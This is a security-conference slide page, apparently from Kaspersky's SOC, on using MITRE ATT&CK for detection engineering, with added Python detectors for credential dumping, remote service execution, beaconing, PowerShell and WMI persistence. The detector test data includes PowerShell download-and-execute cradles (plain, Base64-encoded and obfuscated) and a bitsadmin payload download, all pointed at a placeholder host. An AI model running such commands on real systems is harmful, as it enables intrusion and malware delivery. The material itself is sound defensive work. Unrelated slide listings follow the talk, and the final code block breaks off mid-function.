How MITRE ATT&CK helps security operations
Teymur Kheirkhabarov, Head of SOC R&D
Sergey Soldatov, Head of SOC
Who is Sergey?
Since 2016: Head of SOC at Kaspersky Lab
Internal SOC
Commercial MDR* services
2012 – 2016: Chief manager at RN-Inform
Rosneft security services insourcing
2002 – 2012: TNK-BP Group
IT security integration into business and IT operations
Security controls in IT projects
Security operations
2001 – 2002: Software developer at RIPN
BMSTU graduate
CISA, CISSP
* Managed Detection and Response
Who is Teymur?
2016 – : Head of SOC R&D at Kaspersky Lab
Development: sensors, sensor data, event processing, detection logic, SOC infrastructure
SOC R&D team coordination and management
2011 – 2016: Head of Information Security
IT security integration into business and IT operations
Security controls in IT projects
Security operations
Krasnoyarsk SibSAU graduate
Detect layers: David Bianco's pyramid of pain
http://detect-respond.blogspot.ru/2013/03/the-pyramid-of-pain.html
Lower layers (IoC; AM signatures, Yara): commodity prevention/detection tool capabilities, detection can be done automatically
Top layer (TTP*-based detection): a human analyst is required
* TTP – tactics, techniques and procedures
Different approaches to detection

Attacker activity: use Mimikatz to dump authentication data (passwords/hashes) from memory
IoC-based detection: search for hashes (MD5/SHA1/SHA256) of utilities that dump credentials
Tool-based detection: search for files with specific extensions; for example, Mimikatz exports Kerberos tickets to .kirbi files, and WCE creates wceaux.dll
TTP-based detection: search for processes that access Lsass memory; search for unsigned DLLs loaded into the Lsass process

Attacker activity: use PsExec for remote administration
IoC-based detection: search for hashes (MD5/SHA1/SHA256) of remote administration utilities
Tool-based detection: search for installations of services typical for remote administration utilities; for example, PsExec installs the service PSEXESVC
TTP-based detection: search for remote installation of a new service, after which that service starts a process

Attacker activity: C&C communication
IoC-based detection: search for known C&C (IP/FQDN/URL)
Tool-based detection: search for User-Agents typical for particular utilities/malware; search for use of a particular DGA typical for specific utilities/malware
TTP-based detection: search for periodic network communication; search for communication with randomly generated domain names; search for communication with recently registered domains
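The table above contrasts the layers in words; the following Python block is an added example (not code from the talk) that runs the tool-based and TTP-based rules for the same three activities over a small set of constructed telemetry. Event shapes loosely follow Sysmon (EID 1 ProcessCreate, EID 3 NetworkConnect, EID 10 ProcessAccess) and the System log (EID 7045 service install), but the field names, the LSASS allow-list and the 0x1010 access mask threshold are simplified assumptions for the example, not the real schema or a tuned production rule. The renamed PsExec service (the second host) is the case the tool-based rule misses and the TTP-based rule still catches.

```python
"""Added example: tool-based vs. TTP-based detection over constructed telemetry."""
from collections import defaultdict
from statistics import mean, pstdev

LSASS = r"c:\windows\system32\lsass.exe"
SERVICES = r"c:\windows\system32\services.exe"
PROCESS_VM_READ = 0x0010  # access right needed to read LSASS memory

# Processes that legitimately open LSASS; tune from your own baseline (assumption).
LSASS_ALLOW = frozenset({
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
})

# Constructed telemetry from two hosts, ordered by time (seconds).
EVENTS = [
    # PsExec with its default service name: tool-based and TTP-based rules both fire
    {"t": 10, "eid": 7045, "host": "ws01", "svc": "PSEXESVC", "image": r"c:\windows\psexesvc.exe"},
    {"t": 11, "eid": 1, "host": "ws01", "image": r"c:\windows\psexesvc.exe", "parent": SERVICES},
    # PsExec -r hYkT3 (renamed service): only the TTP-based rule fires
    {"t": 40, "eid": 7045, "host": "ws02", "svc": "hYkT3", "image": r"c:\windows\hykt3.exe"},
    {"t": 41, "eid": 1, "host": "ws02", "image": r"c:\windows\hykt3.exe", "parent": SERVICES},
    # User-land binary opens LSASS with the 0x1010 mask commonly seen from credential dumpers
    {"t": 50, "eid": 10, "host": "ws02", "source": r"c:\users\bob\tool.exe", "target": LSASS, "access": 0x1010},
    # csrss.exe opens LSASS with full access as part of normal operation
    {"t": 51, "eid": 10, "host": "ws02", "source": r"c:\windows\system32\csrss.exe", "target": LSASS, "access": 0x1FFFFF},
    # Interactive browsing: irregular timing
    *[{"t": t, "eid": 3, "host": "ws01", "dst": "198.51.100.20"} for t in (100, 104, 131, 132, 190, 260, 263)],
    # Beacon: one connection every 60 s
    *[{"t": 100 + 60 * i, "eid": 3, "host": "ws02", "dst": "203.0.113.7"} for i in range(8)],
]


def tool_based_psexec(events):
    """Tool-based: the service name PsExec installs by default."""
    return [(e["host"], e["svc"]) for e in events
            if e["eid"] == 7045 and e["svc"].upper() == "PSEXESVC"]


def ttp_remote_service_exec(events, window=30):
    """TTP-based: a newly installed service whose image services.exe starts
    within `window` seconds, whatever the tool or the service name."""
    hits = []
    installs = [e for e in events if e["eid"] == 7045]
    starts = [e for e in events if e["eid"] == 1 and e["parent"] == SERVICES]
    for svc in installs:
        for proc in starts:
            if (proc["host"] == svc["host"] and proc["image"] == svc["image"]
                    and 0 <= proc["t"] - svc["t"] <= window):
                hits.append((svc["host"], svc["svc"], proc["image"]))
    return hits


def ttp_lsass_access(events, allow=LSASS_ALLOW):
    """TTP-based: a process outside the allow-list opens LSASS with VM_READ."""
    return [(e["host"], e["source"], hex(e["access"])) for e in events
            if e["eid"] == 10 and e["target"] == LSASS
            and e["access"] & PROCESS_VM_READ and e["source"] not in allow]


def ttp_beacon(events, min_conns=6, max_cv=0.1):
    """TTP-based: periodic connections to one destination, i.e. inter-arrival
    times with a low coefficient of variation (std / mean)."""
    by_dst = defaultdict(list)
    for e in events:
        if e["eid"] == 3:
            by_dst[(e["host"], e["dst"])].append(e["t"])
    hits = []
    for (host, dst), times in by_dst.items():
        if len(times) < min_conns:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            hits.append((host, dst, round(avg, 1)))
    return hits


if __name__ == "__main__":
    print("tool-based PsExec:", tool_based_psexec(EVENTS))
    print("TTP service exec :", ttp_remote_service_exec(EVENTS))
    print("TTP LSASS access :", ttp_lsass_access(EVENTS))
    print("TTP beacon       :", ttp_beacon(EVENTS))
```

In real operations the beacon rule needs jitter tolerance (malware randomizes sleep) and the LSASS rule needs an allow-list built from your own telemetry; both thresholds above are illustrative starting points.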
Tactics, Techniques and Procedures
Tactic – the way the threat actor operates during different steps of its operation/campaign. Tactics represent the "why" of an ATT&CK technique: the adversary's tactical objective, the reason for performing an action.
Technique – the approach the threat actor uses to achieve a tactic. A technique represents "how" an adversary achieves a tactical objective by performing an action. For example, an adversary may dump credentials to achieve credential access.
Procedure – the exact way a particular adversary or piece of software implements a technique. These are described in the examples sections of ATT&CK techniques.
Tactic (why?) → Technique (how?) → Procedure (particular implementation)
ATT&CK – Adversarial Tactics, Techniques and Common Knowledge
https://attack.mitre.org/matrices/enterprise/
(Enterprise matrix screenshot: columns are Tactics, cells are Techniques)
Technique
https://attack.mitre.org/techniques/T1060/
The importance of Procedure
For each Technique many Procedures can exist
Some Procedures can't be detected due to technological limitations
Not all Procedures are yet known
What do we detect? Procedures!
Where can Procedures be taken from? The ATT&CK technique description!
Good talks on the Internet
https://offzone.moscow/speakers/teymur-heirhabarov/
https://2017.zeronights.ru/report/hunting-for-credentials-dumping-in-windows-environment/
https://www.slideshare.net/heirhabarov/kheirkhabarov24052017phdays7
Examples of Techniques and corresponding Procedures
T1086: PowerShell (now T1059.001 in current ATT&CK)
(chart: ~45 000 PC, last 30 days period)
PowerShell in autorun
PowerShell suspicious command lines (hit counts before adaptation vs. after adaptation)
PowerShell download cradles: https://gist.github.com/HarmJ0y/bb48307ffa663256e239#file-downloadcradles-ps1
PowerShell obfuscation: https://github.com/danielbohannon/Invoke-Obfuscation
PowerShell Base64 encoding
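The PowerShell procedures listed above (suspicious command lines, download cradles, obfuscation, Base64 encoding) are all variations an analyst has to see through before matching. The Python block below is an added example, not code from the talk, that classifies process command lines the way such a detect would: it decodes -EncodedCommand payloads (UTF-16LE Base64), strips backtick escapes and 'a'+'b' string splitting, and only then matches cradle and Invoke-Expression patterns. The four sample command lines are constructed, and the allow-list of known admin scripts is an assumption standing in for the "after adaptation" tuning shown in the slides.

```python
"""Added example: classify PowerShell command lines after decoding and de-obfuscation."""
import base64
import re

DOWNLOAD = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|"
                      r"\biwr\b|\bwget\b|\bcurl\b|bitstransfer|xmlhttp|invoke-restmethod|\birm\b")
IEX = re.compile(r"\biex\b|invoke-expression")
HIDDEN = re.compile(r"-w[a-z]*\s+hidden")          # -w / -WindowStyle Hidden
BYPASS = re.compile(r"-e[a-z]*\s+bypass")          # -ep / -ExecutionPolicy Bypass
FILE_ARG = re.compile(r'-file\s+"?([^\s"]+)')
ENC_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
OBF_MARKERS = [r"`", r"['\"]\s*\+\s*['\"]", r"\[char\]", r"-join\b", r"\{\d+\}", r"-f\s+['\"]"]

# Known admin scripts; tune from your own baseline (assumption).
ALLOWED_SCRIPTS = frozenset({r"c:\scripts\inventory.ps1"})


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload of -e/-enc/-EncodedCommand, or None."""
    for m in ENC_FLAG.finditer(cmdline):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def normalize(text):
    """Undo backtick escapes and 'a'+'b' string splitting, then lower-case."""
    text = text.replace("`", "")
    while True:
        joined = CONCAT.sub(r"'\1\2'", text)
        if joined == text:
            break
        text = joined
    return text.lower()


def obfuscation_score(text):
    """Count cheap obfuscation markers (backticks, string concatenation, [char], -join, -f)."""
    return sum(len(re.findall(p, text, re.I)) for p in OBF_MARKERS)


def classify(cmdline, allowed_scripts=ALLOWED_SCRIPTS):
    """Return the set of tags the command line earns; empty means nothing to review."""
    tags = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.add("encoded")
    raw = cmdline + " " + (decoded or "")
    if obfuscation_score(raw) >= 3:
        tags.add("obfuscated")
    text = normalize(raw)
    if DOWNLOAD.search(text):
        tags.add("download_cradle")
    if IEX.search(text):
        tags.add("invoke_expression")
    if HIDDEN.search(text):
        tags.add("hidden_window")
    if BYPASS.search(text):
        tags.add("execution_policy_bypass")
    # Adaptation: -ExecutionPolicy Bypass alone is normal for known admin scripts.
    m = FILE_ARG.search(text)
    if m and m.group(1) in {p.lower() for p in allowed_scripts}:
        tags.discard("execution_policy_bypass")
    return tags


PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/b.ps1')"
B64 = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

# Constructed samples: plain cradle, encoded cradle, obfuscated cradle, benign admin script.
SAMPLES = [
    '''powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"''',
    f"powershell.exe -NoP -NonI -W Hidden -Enc {B64}",
    r'''powershell -c "&('I'+'EX') (NE`W-OB`JECT NeT.WeBcLiEnT).DoWnLoAdStRiNg('http://192.0.2.10/x')"''',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(sorted(classify(s)), "<-", s[:70])
```

The point of normalizing before matching is that the same download cradle is matched once, whatever wrapper the procedure puts around it; the obfuscation score is a separate, coarse signal because heavily obfuscated command lines (Invoke-Obfuscation output, for instance) will not normalize cleanly and should be reviewed on their own.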
T1084: Windows Management Instrumentation Event Subscription (now T1546.003 in current ATT&CK)
Enumeration of installed ActiveScript consumers (hit counts before adaptation vs. after adaptation)
Enumeration of installed CommandLine consumers (hit counts before adaptation vs. after adaptation)
(charts: ~146 000 PC, 1 year period)
Malicious CommandLine event consumer
Malicious ActiveScript event consumer
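The enumeration procedure above works because a permanent WMI subscription needs three objects in root\subscription: an __EventFilter (the WQL trigger), an __EventConsumer (what runs) and a __FilterToConsumerBinding joining them. The Python block below is an added example, not code from the talk, that joins a constructed snapshot of those three classes and flags the two consumer classes that execute code (CommandLineEventConsumer, ActiveScriptEventConsumer) unless they are allow-listed. The snapshot is constructed: the "Updater" and "LogonWatch" entries imitate common persistence patterns, the other two are modelled on default Windows entries, and the allow-list is an assumption standing in for the "after adaptation" tuning.

```python
"""Added example: review WMI permanent event subscriptions from a constructed snapshot."""
import re

# Constructed root\subscription snapshot, shaped like __EventFilter, __EventConsumer
# and __FilterToConsumerBinding as read with Get-WmiObject -Namespace root\subscription.
FILTERS = {
    "BVTFilter": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
                 "TargetInstance ISA 'Win32_Processor' AND TargetInstance.LoadPercentage > 99",
    "SCM Event Log Filter": "select * from MSFT_SCMEventLogEvent",
    "Updater": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
               "TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND "
               "TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325",
    "LogonWatch": "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE "
                  "TargetInstance ISA 'Win32_LogonSession'",
}
CONSUMERS = {
    "BVTConsumer": {"class": "ActiveScriptEventConsumer",
                    "payload": 'Set fso = CreateObject("Scripting.FileSystemObject")'},  # constructed stand-in
    "SCM Event Log Consumer": {"class": "NTEventLogEventConsumer", "payload": ""},
    "Updater": {"class": "CommandLineEventConsumer",
                "payload": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                           ".DownloadString('http://192.0.2.10/u.ps1')\""},
    "LogonWatch": {"class": "ActiveScriptEventConsumer",
                   "payload": 'Set sh = CreateObject("WScript.Shell"): '
                              'sh.Run "cmd /c bitsadmin /transfer j http://192.0.2.10/x %TEMP%\\x.exe", 0'},
}
BINDINGS = [  # (filter, consumer) pairs from __FilterToConsumerBinding
    ("BVTFilter", "BVTConsumer"),
    ("SCM Event Log Filter", "SCM Event Log Consumer"),
    ("Updater", "Updater"),
    ("LogonWatch", "LogonWatch"),
]

EXEC_CLASSES = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}  # the two that run code
PAYLOAD_MARKERS = re.compile(r"powershell|cmd(\.exe| /c)|wscript|cscript|mshta|regsvr32|"
                             r"rundll32|bitsadmin|certutil|-enc\b|https?://", re.I)
TRIGGER_MARKERS = re.compile(r"SystemUpTime|Win32_LocalTime|Win32_LogonSession|"
                             r"Win32_ProcessStartTrace|Win32_LoggedOnUser", re.I)
# Consumers present by default on some Windows builds; tune from your baseline (assumption).
ALLOWLIST = frozenset({"BVTConsumer", "SCM Event Log Consumer"})


def resolve_bindings(filters, consumers, bindings):
    """Join each binding to its filter query and consumer definition."""
    rows = []
    for f, c in bindings:
        con = consumers.get(c, {"class": None, "payload": None})
        rows.append({"filter": f, "query": filters.get(f), "consumer": c,
                     "class": con["class"], "payload": con["payload"]})
    return rows


def suspicious_subscriptions(filters, consumers, bindings, allowlist=ALLOWLIST):
    """Return (consumer, class, reasons) for every code-executing consumer that is
    bound to a filter and not allow-listed.  An empty reasons list still means
    'an unknown consumer that can run code': review it."""
    hits = []
    for row in resolve_bindings(filters, consumers, bindings):
        if row["consumer"] in allowlist or row["class"] not in EXEC_CLASSES:
            continue
        reasons = []
        if row["query"] is None:
            reasons.append("dangling binding")
        if PAYLOAD_MARKERS.search(row["payload"] or ""):
            reasons.append("payload launches an interpreter or downloader")
        if TRIGGER_MARKERS.search(row["query"] or ""):
            reasons.append("boot/time/logon trigger")
        hits.append((row["consumer"], row["class"], reasons))
    return hits


if __name__ == "__main__":
    print("before adaptation:", suspicious_subscriptions(FILTERS, CONSUMERS, BINDINGS, allowlist=frozenset()))
    print("after adaptation :", suspicious_subscriptions(FILTERS, CONSUMERS, BINDINGS))
```

Running it with an empty allow-list reproduces the "before adaptation" picture (the default BVTConsumer shows up on every host); the allow-list is what turns the enumeration into a usable detect, and it should be built from your own fleet's baseline rather than copied from an example.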
Use case #1: Detect development
ATT&CK – one of the good sources of detect ideas
Pipeline: attack emulation → analysis of detection capabilities → required telemetry and required processing → detect development, testing, publication → endless testing in operations → metrics
Other sources of detect ideas – TI from operations
Public: Twitter, blogs, talks, etc.; tests*
Private: internal threat research; operations practice (threat hunting**, DFIRMA***, security assessment/red teaming)
* https://attackevals.mitre.org/evaluations.html , for example
** the practice of searching iteratively through data to detect [advanced] threats that evade automatic security solutions
*** Digital forensics, Incident response, Malware analysis
Use case #1': Detect development priorities (post-breach)
Tactic priorities: Persistence, Privilege escalation, Defense evasion, Credential access, Lateral movement, Execution, …
Technique priorities:
Available telemetry
Used by which APT actors, and how relevant are they to you?
Required investments (~ risk assessment)
Use case #2: Detect classification
Detect management
Understand current coverage
• What do we have for each technique*?
• Gap analysis
Extend coverage
• Add new detects?
• Update existing ones?
Simplifies the R&D team's work
* Through the appropriate Procedure
Detects ("Hunts") mapped to MITRE techniques
Use case #3: SOC Analyst's body of knowledge
Attack kill chain (tactics)
Descriptions of the attack techniques known so far
Public reports about actual APT campaigns linked to the techniques used
Recommendations on detection and mitigation
In addition:
• OS architecture
• Known attacker toolsets
• Not hypothetical attacks, but attacks taken from practice*
* https://reply-to-all.blogspot.com/2013/01/blog-post.html
Use case #4: detect rate assessment by ATT&CK coverage
Choose a scenario (sequence of particular procedures)*
Execute it in the lab and see what is detected
Evaluate based on detection types**: telemetry, enrichment, behavior detect
Now results can be compared***
Whether a technique can be considered covered based on the test is an open question – it depends on the actual procedures used in the test
* https://attackevals.mitre.org/
** https://attackevals.mitre.org/methodology/detection-categorization.html
*** https://reply-to-all.blogspot.com/2018/12/mitre-edr.html
MITRE ATT&CK Evaluations
Particular Procedures:
APT3: 56 Enterprise techniques across 10 tactics
"Living off the land"*
Focus on "Primary" techniques**, on behavior and not on tools and IoCs
2 scenarios: 10-step with Cobalt Strike + 10-step with Empire***
Same lab environment for all vendors
Detection categorization
Main detection types:
• None
• Telemetry
• Indicator of Compromise
• Enrichment
• General behavior
• Specific behavior
Modifiers:
• Delayed
• Tainted
• Configuration change
* https://www.youtube.com/watch?v=j-r6UonEkUw
** Differentiate "Primary" and "Enabling" techniques. "Enabling" – many of the techniques required Command-Line Interface, Execution through API, and PowerShell. In the assessment MITRE focused on the Primary technique that was performed, rather than on the mechanism of execution (which was considered the Enabling technique)
*** https://www.cobaltstrike.com/ ; https://github.com/EmpireProject/Empire
BAS: Breach and Attack Simulation
METTA: https://github.com/uber-common/metta
Caldera: https://github.com/mitre/caldera
Unfetter: https://mitre.github.io/unfetter/
Endgame RTA: https://github.com/endgameinc/RTA
Red Canary – Atomic Red Team: https://github.com/redcanaryco/atomic-red-team
Microsoft: https://blogs.technet.microsoft.com/motiba/2018/04/09/invoke-adversary-simulating-adversary-operations/
KaLaBAS?
Existing tools are vendor specific
Not enough tests
Need to integrate into the existing auto-testing infrastructure
Use case #5: Adversary emulation, red teaming
Common framework for Red team, Blue team and Purple team collaboration
Create adversary emulation scenarios: choose relevant TTPs
Create a red team plan: choose TTPs that might be missed by the existing Blue team
Gap analysis of current defensive technologies – prioritize future investments
SOC operational efficiency (maturity) assessment
!!DEMO!!
Let's talk?

Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesExploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesSanjay Willie
 

Recently uploaded (20)

From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dash
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesExploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
 

How MITRE ATT&CK helps security operations

  • 1. Teymur Kheirkhabarov, Head of SOC R&D; Sergey Soldatov, Head of SOC. How MITRE ATT&CK helps security operations
  • 2. Who is Sergey?
    Since 2016: Head of SOC at Kaspersky Lab (internal SOC; commercial MDR* services)
    2012 – 2016: Chief manager at RN-Inform (Rosneft security services insourcing)
    2002 – 2012: TNK-BP Group (IT security integration into business and IT operations; security controls in IT projects; security operations)
    2001 – 2002: Software developer at RIPN
    BMSTU graduate; CISA, CISSP
    * Managed Detection and Response
  • 3. Who is Teymur?
    2016 – : Head of SOC R&D at Kaspersky Lab (development: sensors, sensor data, event processing, detection logic, SOC infrastructure; SOC R&D team coordination and management)
    2011 – 2016: Head of Information Security (IT security integration into business and IT operations; security controls in IT projects; security operations)
    Krasnoyarsk SibSAU graduate
  • 4. Detect layers: David Bianco's pyramid of pain
    http://detect-respond.blogspot.ru/2013/03/the-pyramid-of-pain.html
    Layers, bottom to top: IoC; AM signature, Yara; TTP*-based detect
    Lower layers: commodity prevention/detection tool capabilities (can be done automatically). Top layer: human analyst required.
    * TTP – tactics, techniques and procedures
  • 5. Different approaches to detection
    Attacker activity: Mimikatz used to dump authentication data (passwords/hashes) from memory
      IoC-based detection: search for hashes (MD5/SHA1/SHA256) of utilities that dump credentials
      Tool-based detection: search for files with specific extensions; for example, Mimikatz exports Kerberos tickets to .kirbi files, and WCE creates wceaux.dll
      TTP-based detection: search for processes that access lsass memory; use of unsigned DLLs loaded into the lsass process
    Attacker activity: PsExec used for remote administration
      IoC-based detection: search for hashes (MD5/SHA1/SHA256) of remote administration utilities
      Tool-based detection: search for installation of services typical for remote administration utilities; for example, PsExec installs the service PSEXESVC
      TTP-based detection: search for remote installation of a new service, after which that service starts a process
    Attacker activity: C&C communication
      IoC-based detection: search for known C&C (IP/FQDN/URL)
      Tool-based detection: search for User-Agents typical for particular utilities/malware; search for use of a particular DGA typical for specific utilities/malware
      TTP-based detection: search for periodic network communication; communication with randomly generated domain names; communication with recently registered domains
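The TTP-based column of slide 5 is the one a SOC can implement without knowing a tool's hash or service name. As an added example (not code from the deck or from Kaspersky), the Python below runs two of those checks over constructed telemetry: a non-OS process opening lsass.exe with memory-read access, and a service installed from a network logon whose binary spawns a child shortly afterwards. Field names, the lsass allowlist, the 60-second window and all records are assumptions made for the example; the service in the sample is deliberately not called PSEXESVC, to show that the TTP check does not depend on the tool's name.

```python
"""TTP-based detection over constructed endpoint telemetry (added example).

Two of the TTP-based checks from the slide-5 table, run over constructed
records that follow the shape of Sysmon ProcessAccess, System-log
service-install and process-creation events:
  1. a process outside a small OS allowlist opens lsass.exe with memory-read
     access (how any in-memory credential dumper works, whatever its hash);
  2. a service is installed from a network logon and its binary then spawns a
     child process shortly after (remote execution, whatever the service name).
"""
from datetime import datetime

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# OS components that legitimately open lsass. Constructed, deliberately short
# allowlist for the example; a production list is tuned per environment.
LSASS_ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed ProcessAccess records (Sysmon event 10 layout: SourceImage,
# TargetImage, GrantedAccess).
PROCESS_ACCESS = [
    {"host": "ws01", "source": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted": 0x1410},
    {"host": "ws01", "source": r"C:\Users\bob\AppData\Local\Temp\m.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted": 0x1010},
    {"host": "ws02", "source": r"C:\Program Files\Tool\tool.exe",
     "target": r"C:\Windows\System32\notepad.exe", "granted": 0x1FFFFF},
]

# Constructed service-install records (System log 7045 layout), enriched with
# the logon type of the session that installed the service (3 = network).
SERVICE_INSTALL = [
    {"host": "srv01", "time": "2019-05-01T09:00:00", "service": "BackupAgent",
     "image": r"C:\Program Files\Backup\agent.exe", "logon_type": 2},
    {"host": "srv01", "time": "2019-05-01T10:00:00", "service": "WinUpd",
     "image": r"C:\Windows\winupd.exe", "logon_type": 3},
]

# Constructed process-creation records (ParentImage, Image).
PROCESS_CREATE = [
    {"host": "srv01", "time": "2019-05-01T09:00:30",
     "parent": r"C:\Program Files\Backup\agent.exe",
     "image": r"C:\Program Files\Backup\worker.exe"},
    {"host": "srv01", "time": "2019-05-01T10:00:02",
     "parent": r"C:\Windows\winupd.exe",
     "image": r"C:\Windows\System32\cmd.exe"},
]


def detect_lsass_access(records):
    """Return (host, source image) for every non-allowlisted process that
    opened lsass.exe with PROCESS_VM_READ in its granted access mask."""
    hits = []
    for r in records:
        if not r["target"].lower().endswith(r"\lsass.exe"):
            continue
        if r["source"].lower() in LSASS_ALLOWED_SOURCES:
            continue
        if r["granted"] & PROCESS_VM_READ:
            hits.append((r["host"], r["source"]))
    return hits


def detect_remote_service_exec(installs, creates, window_s=60):
    """Correlate a network-logon service install with a child process of the
    service binary within window_s seconds on the same host."""
    findings = []
    for s in installs:
        if s["logon_type"] != 3:
            continue
        t0 = datetime.fromisoformat(s["time"])
        for p in creates:
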